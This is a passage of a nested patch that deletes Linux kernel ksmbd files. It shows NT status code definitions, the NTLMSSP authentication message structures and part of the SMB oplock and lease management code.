+-#define NT_STATUS_NETLOGON_NOT_STARTED (0xC0000000 | 0x0192)
+-#define NT_STATUS_ACCOUNT_EXPIRED (0xC0000000 | 0x0193)
+-#define NT_STATUS_POSSIBLE_DEADLOCK (0xC0000000 | 0x0194)
+-#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT (0xC0000000 | 0x0195)
+-#define NT_STATUS_REMOTE_SESSION_LIMIT (0xC0000000 | 0x0196)
+-#define NT_STATUS_EVENTLOG_FILE_CHANGED (0xC0000000 | 0x0197)
+-#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT (0xC0000000 | 0x0198)
+-#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (0xC0000000 | 0x0199)
+-#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT (0xC0000000 | 0x019a)
+-#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT (0xC0000000 | 0x019b)
+-#define NT_STATUS_FS_DRIVER_REQUIRED (0xC0000000 | 0x019c)
+-#define NT_STATUS_NO_USER_SESSION_KEY (0xC0000000 | 0x0202)
+-#define NT_STATUS_USER_SESSION_DELETED (0xC0000000 | 0x0203)
+-#define NT_STATUS_RESOURCE_LANG_NOT_FOUND (0xC0000000 | 0x0204)
+-#define NT_STATUS_INSUFF_SERVER_RESOURCES (0xC0000000 | 0x0205)
+-#define NT_STATUS_INVALID_BUFFER_SIZE (0xC0000000 | 0x0206)
+-#define NT_STATUS_INVALID_ADDRESS_COMPONENT (0xC0000000 | 0x0207)
+-#define NT_STATUS_INVALID_ADDRESS_WILDCARD (0xC0000000 | 0x0208)
+-#define NT_STATUS_TOO_MANY_ADDRESSES (0xC0000000 | 0x0209)
+-#define NT_STATUS_ADDRESS_ALREADY_EXISTS (0xC0000000 | 0x020a)
+-#define NT_STATUS_ADDRESS_CLOSED (0xC0000000 | 0x020b)
+-#define NT_STATUS_CONNECTION_DISCONNECTED (0xC0000000 | 0x020c)
+-#define NT_STATUS_CONNECTION_RESET (0xC0000000 | 0x020d)
+-#define NT_STATUS_TOO_MANY_NODES (0xC0000000 | 0x020e)
+-#define NT_STATUS_TRANSACTION_ABORTED (0xC0000000 | 0x020f)
+-#define NT_STATUS_TRANSACTION_TIMED_OUT (0xC0000000 | 0x0210)
+-#define NT_STATUS_TRANSACTION_NO_RELEASE (0xC0000000 | 0x0211)
+-#define NT_STATUS_TRANSACTION_NO_MATCH (0xC0000000 | 0x0212)
+-#define NT_STATUS_TRANSACTION_RESPONDED (0xC0000000 | 0x0213)
+-#define NT_STATUS_TRANSACTION_INVALID_ID (0xC0000000 | 0x0214)
+-#define NT_STATUS_TRANSACTION_INVALID_TYPE (0xC0000000 | 0x0215)
+-#define NT_STATUS_NOT_SERVER_SESSION (0xC0000000 | 0x0216)
+-#define NT_STATUS_NOT_CLIENT_SESSION (0xC0000000 | 0x0217)
+-#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE (0xC0000000 | 0x0218)
+-#define NT_STATUS_DEBUG_ATTACH_FAILED (0xC0000000 | 0x0219)
+-#define NT_STATUS_SYSTEM_PROCESS_TERMINATED (0xC0000000 | 0x021a)
+-#define NT_STATUS_DATA_NOT_ACCEPTED (0xC0000000 | 0x021b)
+-#define NT_STATUS_NO_BROWSER_SERVERS_FOUND (0xC0000000 | 0x021c)
+-#define NT_STATUS_VDM_HARD_ERROR (0xC0000000 | 0x021d)
+-#define NT_STATUS_DRIVER_CANCEL_TIMEOUT (0xC0000000 | 0x021e)
+-#define NT_STATUS_REPLY_MESSAGE_MISMATCH (0xC0000000 | 0x021f)
+-#define NT_STATUS_MAPPED_ALIGNMENT (0xC0000000 | 0x0220)
+-#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH (0xC0000000 | 0x0221)
+-#define NT_STATUS_LOST_WRITEBEHIND_DATA (0xC0000000 | 0x0222)
+-#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID (0xC0000000 | 0x0223)
+-#define NT_STATUS_PASSWORD_MUST_CHANGE (0xC0000000 | 0x0224)
+-#define NT_STATUS_NOT_FOUND (0xC0000000 | 0x0225)
+-#define NT_STATUS_NOT_TINY_STREAM (0xC0000000 | 0x0226)
+-#define NT_STATUS_RECOVERY_FAILURE (0xC0000000 | 0x0227)
+-#define NT_STATUS_STACK_OVERFLOW_READ (0xC0000000 | 0x0228)
+-#define NT_STATUS_FAIL_CHECK (0xC0000000 | 0x0229)
+-#define NT_STATUS_DUPLICATE_OBJECTID (0xC0000000 | 0x022a)
+-#define NT_STATUS_OBJECTID_EXISTS (0xC0000000 | 0x022b)
+-#define NT_STATUS_CONVERT_TO_LARGE (0xC0000000 | 0x022c)
+-#define NT_STATUS_RETRY (0xC0000000 | 0x022d)
+-#define NT_STATUS_FOUND_OUT_OF_SCOPE (0xC0000000 | 0x022e)
+-#define NT_STATUS_ALLOCATE_BUCKET (0xC0000000 | 0x022f)
+-#define NT_STATUS_PROPSET_NOT_FOUND (0xC0000000 | 0x0230)
+-#define NT_STATUS_MARSHALL_OVERFLOW (0xC0000000 | 0x0231)
+-#define NT_STATUS_INVALID_VARIANT (0xC0000000 | 0x0232)
+-#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND (0xC0000000 | 0x0233)
+-#define NT_STATUS_ACCOUNT_LOCKED_OUT (0xC0000000 | 0x0234)
+-#define NT_STATUS_HANDLE_NOT_CLOSABLE (0xC0000000 | 0x0235)
+-#define NT_STATUS_CONNECTION_REFUSED (0xC0000000 | 0x0236)
+-#define NT_STATUS_GRACEFUL_DISCONNECT (0xC0000000 | 0x0237)
+-#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED (0xC0000000 | 0x0238)
+-#define NT_STATUS_ADDRESS_NOT_ASSOCIATED (0xC0000000 | 0x0239)
+-#define NT_STATUS_CONNECTION_INVALID (0xC0000000 | 0x023a)
+-#define NT_STATUS_CONNECTION_ACTIVE (0xC0000000 | 0x023b)
+-#define NT_STATUS_NETWORK_UNREACHABLE (0xC0000000 | 0x023c)
+-#define NT_STATUS_HOST_UNREACHABLE (0xC0000000 | 0x023d)
+-#define NT_STATUS_PROTOCOL_UNREACHABLE (0xC0000000 | 0x023e)
+-#define NT_STATUS_PORT_UNREACHABLE (0xC0000000 | 0x023f)
+-#define NT_STATUS_REQUEST_ABORTED (0xC0000000 | 0x0240)
+-#define NT_STATUS_CONNECTION_ABORTED (0xC0000000 | 0x0241)
+-#define NT_STATUS_BAD_COMPRESSION_BUFFER (0xC0000000 | 0x0242)
+-#define NT_STATUS_USER_MAPPED_FILE (0xC0000000 | 0x0243)
+-#define NT_STATUS_AUDIT_FAILED (0xC0000000 | 0x0244)
+-#define NT_STATUS_TIMER_RESOLUTION_NOT_SET (0xC0000000 | 0x0245)
+-#define NT_STATUS_CONNECTION_COUNT_LIMIT (0xC0000000 | 0x0246)
+-#define NT_STATUS_LOGIN_TIME_RESTRICTION (0xC0000000 | 0x0247)
+-#define NT_STATUS_LOGIN_WKSTA_RESTRICTION (0xC0000000 | 0x0248)
+-#define NT_STATUS_IMAGE_MP_UP_MISMATCH (0xC0000000 | 0x0249)
+-#define NT_STATUS_INSUFFICIENT_LOGON_INFO (0xC0000000 | 0x0250)
+-#define NT_STATUS_BAD_DLL_ENTRYPOINT (0xC0000000 | 0x0251)
+-#define NT_STATUS_BAD_SERVICE_ENTRYPOINT (0xC0000000 | 0x0252)
+-#define NT_STATUS_LPC_REPLY_LOST (0xC0000000 | 0x0253)
+-#define NT_STATUS_IP_ADDRESS_CONFLICT1 (0xC0000000 | 0x0254)
+-#define NT_STATUS_IP_ADDRESS_CONFLICT2 (0xC0000000 | 0x0255)
+-#define NT_STATUS_REGISTRY_QUOTA_LIMIT (0xC0000000 | 0x0256)
+-#define NT_STATUS_PATH_NOT_COVERED (0xC0000000 | 0x0257)
+-#define NT_STATUS_NO_CALLBACK_ACTIVE (0xC0000000 | 0x0258)
+-#define NT_STATUS_LICENSE_QUOTA_EXCEEDED (0xC0000000 | 0x0259)
+-#define NT_STATUS_PWD_TOO_SHORT (0xC0000000 | 0x025a)
+-#define NT_STATUS_PWD_TOO_RECENT (0xC0000000 | 0x025b)
+-#define NT_STATUS_PWD_HISTORY_CONFLICT (0xC0000000 | 0x025c)
+-#define NT_STATUS_PLUGPLAY_NO_DEVICE (0xC0000000 | 0x025e)
+-#define NT_STATUS_UNSUPPORTED_COMPRESSION (0xC0000000 | 0x025f)
+-#define NT_STATUS_INVALID_HW_PROFILE (0xC0000000 | 0x0260)
+-#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH (0xC0000000 | 0x0261)
+-#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND (0xC0000000 | 0x0262)
+-#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0263)
+-#define NT_STATUS_RESOURCE_NOT_OWNED (0xC0000000 | 0x0264)
+-#define NT_STATUS_TOO_MANY_LINKS (0xC0000000 | 0x0265)
+-#define NT_STATUS_QUOTA_LIST_INCONSISTENT (0xC0000000 | 0x0266)
+-#define NT_STATUS_FILE_IS_OFFLINE (0xC0000000 | 0x0267)
+-#define NT_STATUS_NETWORK_SESSION_EXPIRED  (0xC0000000 | 0x035c)
+-#define NT_STATUS_NO_SUCH_JOB (0xC0000000 | 0xEDE)     /* scheduler */
+-#define NT_STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP (0xC0000000 | 0x5D0000)
+-#define NT_STATUS_PENDING 0x00000103
+-#endif				/* _NTERR_H */
+diff --git a/fs/ksmbd/ntlmssp.h b/fs/ksmbd/ntlmssp.h
+deleted file mode 100644
+index f13153c18b4e9..0000000000000
+--- a/fs/ksmbd/ntlmssp.h
++++ /dev/null
+@@ -1,169 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2002,2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-#ifndef __KSMBD_NTLMSSP_H
+-#define __KSMBD_NTLMSSP_H
+-
+-#define NTLMSSP_SIGNATURE "NTLMSSP"
+-
+-/* Security blob target info data */
+-#define TGT_Name        "KSMBD"
+-
+-/*
+- * Size of the crypto key returned on the negotiate SMB in bytes
+- */
+-#define CIFS_CRYPTO_KEY_SIZE	(8)
+-#define CIFS_KEY_SIZE	(40)
+-
+-/*
+- * Size of encrypted user password in bytes
+- */
+-#define CIFS_ENCPWD_SIZE	(16)
+-#define CIFS_CPHTXT_SIZE	(16)
+-
+-/* Message Types */
+-#define NtLmNegotiate     cpu_to_le32(1)
+-#define NtLmChallenge     cpu_to_le32(2)
+-#define NtLmAuthenticate  cpu_to_le32(3)
+-#define UnknownMessage    cpu_to_le32(8)
+-
+-/* Negotiate Flags */
+-#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
+-#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
+-#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
+-/* define reserved9                       0x08 */
+-#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
+-#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
+-#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
+-#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
+-/* defined reserved 8                   0x0100 */
+-#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
+-#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
+-#define NTLMSSP_ANONYMOUS               0x0800
+-#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
+-#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
+-#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
+-#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
+-#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
+-#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
+-#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
+-#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
+-/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
+-#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
+-#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
+-#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
+-#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
+-/* #define reserved4                 0x1000000 */
+-#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we do not set */
+-/* #define reserved3                 0x4000000 */
+-/* #define reserved2                 0x8000000 */
+-/* #define reserved1                0x10000000 */
+-#define NTLMSSP_NEGOTIATE_128       0x20000000
+-#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
+-#define NTLMSSP_NEGOTIATE_56        0x80000000
+-
+-/* Define AV Pair Field IDs */
+-enum av_field_type {
+-	NTLMSSP_AV_EOL = 0,
+-	NTLMSSP_AV_NB_COMPUTER_NAME,
+-	NTLMSSP_AV_NB_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_COMPUTER_NAME,
+-	NTLMSSP_AV_DNS_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_TREE_NAME,
+-	NTLMSSP_AV_FLAGS,
+-	NTLMSSP_AV_TIMESTAMP,
+-	NTLMSSP_AV_RESTRICTION,
+-	NTLMSSP_AV_TARGET_NAME,
+-	NTLMSSP_AV_CHANNEL_BINDINGS
+-};
+-
+-/* Although typedefs are not commonly used for structure definitions */
+-/* in the Linux kernel, in this particular case they are useful      */
+-/* to more closely match the standards document for NTLMSSP from     */
+-/* OpenGroup and to make the code more closely match the standard in */
+-/* appearance */
+-
+-struct security_buffer {
+-	__le16 Length;
+-	__le16 MaximumLength;
+-	__le32 BufferOffset;	/* offset to buffer */
+-} __packed;
+-
+-struct target_info {
+-	__le16 Type;
+-	__le16 Length;
+-	__u8 Content[];
+-} __packed;
+-
+-struct negotiate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	struct security_buffer DomainName;	/* RFC 1001 style and ASCII */
+-	struct security_buffer WorkstationName;	/* RFC 1001 and ASCII */
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-	char DomainString[];
+-	/* followed by WorkstationString */
+-} __packed;
+-
+-struct challenge_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;   /* NtLmChallenge = 2 */
+-	struct security_buffer TargetName;
+-	__le32 NegotiateFlags;
+-	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
+-	__u8 Reserved[8];
+-	struct security_buffer TargetInfoArray;
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-} __packed;
+-
+-struct authenticate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
+-	struct security_buffer LmChallengeResponse;
+-	struct security_buffer NtChallengeResponse;
+-	struct security_buffer DomainName;
+-	struct security_buffer UserName;
+-	struct security_buffer WorkstationName;
+-	struct security_buffer SessionKey;
+-	__le32 NegotiateFlags;
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-	char UserString[];
+-} __packed;
+-
+-struct ntlmv2_resp {
+-	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	__le32 blob_signature;
+-	__u32  reserved;
+-	__le64  time;
+-	__u64  client_chal; /* random */
+-	__u32  reserved2;
+-	/* array of name entries could follow ending in minimum 4 byte struct */
+-} __packed;
+-
+-/* per smb session structure/fields */
+-struct ntlmssp_auth {
+-	/* whether session key is per smb session */
+-	bool		sesskey_per_smbsess;
+-	/* sent by client in type 1 ntlmsssp exchange */
+-	__u32		client_flags;
+-	/* sent by server in type 2 ntlmssp exchange */
+-	__u32		conn_flags;
+-	/* sent to server */
+-	unsigned char	ciphertext[CIFS_CPHTXT_SIZE];
+-	/* used by ntlmssp */
+-	char		cryptkey[CIFS_CRYPTO_KEY_SIZE];
+-};
+-#endif /* __KSMBD_NTLMSSP_H */
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+deleted file mode 100644
+index 4b210cdd75569..0000000000000
+--- a/fs/ksmbd/oplock.c
++++ /dev/null
+@@ -1,1722 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/moduleparam.h>
+-
+-#include "glob.h"
+-#include "oplock.h"
+-
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-
+-static LIST_HEAD(lease_table_list);
+-static DEFINE_RWLOCK(lease_list_lock);
+-
+-/**
+- * alloc_opinfo() - allocate a new opinfo object for oplock info
+- * @work:	smb work
+- * @id:		fid of open file
+- * @Tid:	tree id of connection
+- *
+- * Return:      allocated opinfo object on success, otherwise NULL
+- */
+-static struct oplock_info *alloc_opinfo(struct ksmbd_work *work,
+-					u64 id, __u16 Tid)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct oplock_info *opinfo;
+-
+-	opinfo = kzalloc(sizeof(struct oplock_info), GFP_KERNEL);
+-	if (!opinfo)
+-		return NULL;
+-
+-	opinfo->sess = sess;
+-	opinfo->conn = conn;
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	opinfo->pending_break = 0;
+-	opinfo->fid = id;
+-	opinfo->Tid = Tid;
+-	INIT_LIST_HEAD(&opinfo->op_entry);
+-	INIT_LIST_HEAD(&opinfo->interim_list);
+-	init_waitqueue_head(&opinfo->oplock_q);
+-	init_waitqueue_head(&opinfo->oplock_brk);
+-	atomic_set(&opinfo->refcount, 1);
+-	atomic_set(&opinfo->breaking_cnt, 0);
+-
+-	return opinfo;
+-}
+-
+-static void lease_add_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb = opinfo->o_lease->l_lb;
+-
+-	spin_lock(&lb->lb_lock);
+-	list_add_rcu(&opinfo->lease_entry, &lb->lease_list);
+-	spin_unlock(&lb->lb_lock);
+-}
+-
+-static void lease_del_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb = opinfo->o_lease->l_lb;
+-
+-	if (!lb)
+-		return;
+-
+-	spin_lock(&lb->lb_lock);
+-	if (list_empty(&opinfo->lease_entry)) {
+-		spin_unlock(&lb->lb_lock);
+-		return;
+-	}
+-
+-	list_del_init(&opinfo->lease_entry);
+-	opinfo->o_lease->l_lb = NULL;
+-	spin_unlock(&lb->lb_lock);
+-}
+-
+-static void lb_add(struct lease_table *lb)
+-{
+-	write_lock(&lease_list_lock);
+-	list_add(&lb->l_entry, &lease_table_list);
+-	write_unlock(&lease_list_lock);
+-}
+-
+-static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease;
+-
+-	lease = kmalloc(sizeof(struct lease), GFP_KERNEL);
+-	if (!lease)
+-		return -ENOMEM;
+-
+-	memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	lease->state = lctx->req_state;
+-	lease->new_state = 0;
+-	lease->flags = lctx->flags;
+-	lease->duration = lctx->duration;
+-	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+-	lease->version = lctx->version;
+-	lease->epoch = 0;
+-	INIT_LIST_HEAD(&opinfo->lease_entry);
+-	opinfo->o_lease = lease;
+-
+-	return 0;
+-}
+-
+-static void free_lease(struct oplock_info *opinfo)
+-{
+-	struct lease *lease;
+-
+-	lease = opinfo->o_lease;
+-	kfree(lease);
+-}
+-
+-static void free_opinfo(struct oplock_info *opinfo)
+-{
+-	if (opinfo->is_lease)
+-		free_lease(opinfo);
+-	kfree(opinfo);
+-}
+-
+-static inline void opinfo_free_rcu(struct rcu_head *rcu_head)
+-{
+-	struct oplock_info *opinfo;
+-
+-	opinfo = container_of(rcu_head, struct oplock_info, rcu_head);
+-	free_opinfo(opinfo);
+-}
+-
+-struct oplock_info *opinfo_get(struct ksmbd_file *fp)
+-{
+-	struct oplock_info *opinfo;
+-
+-	rcu_read_lock();
+-	opinfo = rcu_dereference(fp->f_opinfo);
+-	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
+-		opinfo = NULL;
+-	rcu_read_unlock();
+-
+-	return opinfo;
+-}
+-
+-static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
+-{
+-	struct oplock_info *opinfo;
+-
+-	if (list_empty(&ci->m_op_list))
+-		return NULL;
+-
+-	rcu_read_lock();
+-	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
+-					op_entry);
+-	if (opinfo) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			opinfo = NULL;
+-		else {
+-			atomic_inc(&opinfo->conn->r_count);
+-			if (ksmbd_conn_releasing(opinfo->conn)) {
+-				atomic_dec(&opinfo->conn->r_count);
+-				atomic_dec(&opinfo->refcount);
+-				opinfo = NULL;
+-			}
+-		}
+-	}
+-
+-	rcu_read_unlock();
+-
+-	return opinfo;
+-}
+-
+-static void opinfo_conn_put(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	if (!opinfo)
+-		return;
+-
+-	conn = opinfo->conn;
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+-	opinfo_put(opinfo);
+-}
+-
+-void opinfo_put(struct oplock_info *opinfo)
+-{
+-	if (!atomic_dec_and_test(&opinfo->refcount))
+-		return;
+-
+-	call_rcu(&opinfo->rcu_head, opinfo_free_rcu);
+-}
+-
+-static void opinfo_add(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
+-
+-	write_lock(&ci->m_lock);
+-	list_add_rcu(&opinfo->op_entry, &ci->m_op_list);
+-	write_unlock(&ci->m_lock);
+-}
+-
+-static void opinfo_del(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
+-
+-	if (opinfo->is_lease) {
+-		write_lock(&lease_list_lock);
+-		lease_del_list(opinfo);
+-		write_unlock(&lease_list_lock);
+-	}
+-	write_lock(&ci->m_lock);
+-	list_del_rcu(&opinfo->op_entry);
+-	write_unlock(&ci->m_lock);
+-}
+-
+-static unsigned long opinfo_count(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_read(&fp->f_ci->sop_count);
+-	else
+-		return atomic_read(&fp->f_ci->op_count);
+-}
+-
+-static void opinfo_count_inc(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_inc(&fp->f_ci->sop_count);
+-	else
+-		return atomic_inc(&fp->f_ci->op_count);
+-}
+-
+-static void opinfo_count_dec(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_dec(&fp->f_ci->sop_count);
+-	else
+-		return atomic_dec(&fp->f_ci->op_count);
+-}
+-
+-/**
+- * opinfo_write_to_read() - convert a write oplock to read oplock
+- * @opinfo:		current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_write_to_read(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_read_handle_to_read() - convert a read/handle oplock to read oplock
+- * @opinfo:		current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_read_handle_to_read(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	lease->state = lease->new_state;
+-	opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_write_to_none() - convert a write oplock to none
+- * @opinfo:	current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_write_to_none(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_read_to_none() - convert a write read to none
+- * @opinfo:	current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_read_to_none(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (opinfo->level != SMB2_OPLOCK_LEVEL_II) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * lease_read_to_write() - upgrade lease state from read to write
+- * @opinfo:	current lease info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int lease_read_to_write(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(lease->state & SMB2_LEASE_READ_CACHING_LE)) {
+-		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-
+-	lease->new_state = SMB2_LEASE_NONE_LE;
+-	lease->state |= SMB2_LEASE_WRITE_CACHING_LE;
+-	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
+-	else
+-		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	return 0;
+-}
+-
+-/**
+- * lease_none_upgrade() - upgrade lease state from none
+- * @opinfo:	current lease info
+- * @new_state:	new lease state
+- *
+- * Return:	0 on success, otherwise -EINVAL
+- */
+-static int lease_none_upgrade(struct oplock_info *opinfo, __le32 new_state)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(lease->state == SMB2_LEASE_NONE_LE)) {
+-		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-
+-	lease->new_state = SMB2_LEASE_NONE_LE;
+-	lease->state = new_state;
+-	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-			opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
+-		else
+-			opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-	else if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	else if (lease->state & SMB2_LEASE_READ_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	return 0;
+-}
+-
+-/**
+- * close_id_del_oplock() - release oplock object at file close time
+- * @fp:		ksmbd file pointer
+- */
+-void close_id_del_oplock(struct ksmbd_file *fp)
+-{
+-	struct oplock_info *opinfo;
+-
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return;
+-
+-	opinfo = opinfo_get(fp);
+-	if (!opinfo)
+-		return;
+-
+-	opinfo_del(opinfo);
+-
+-	rcu_assign_pointer(fp->f_opinfo, NULL);
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		opinfo->op_state = OPLOCK_CLOSING;
+-		wake_up_interruptible_all(&opinfo->oplock_q);
+-		if (opinfo->is_lease) {
+-			atomic_set(&opinfo->breaking_cnt, 0);
+-			wake_up_interruptible_all(&opinfo->oplock_brk);
+-		}
+-	}
+-
+-	opinfo_count_dec(fp);
+-	atomic_dec(&opinfo->refcount);
+-	opinfo_put(opinfo);
+-}
+-
+-/**
+- * grant_write_oplock() - grant exclusive/batch oplock or write lease
+- * @opinfo_new:	new oplock info object
+- * @req_oplock: request oplock
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
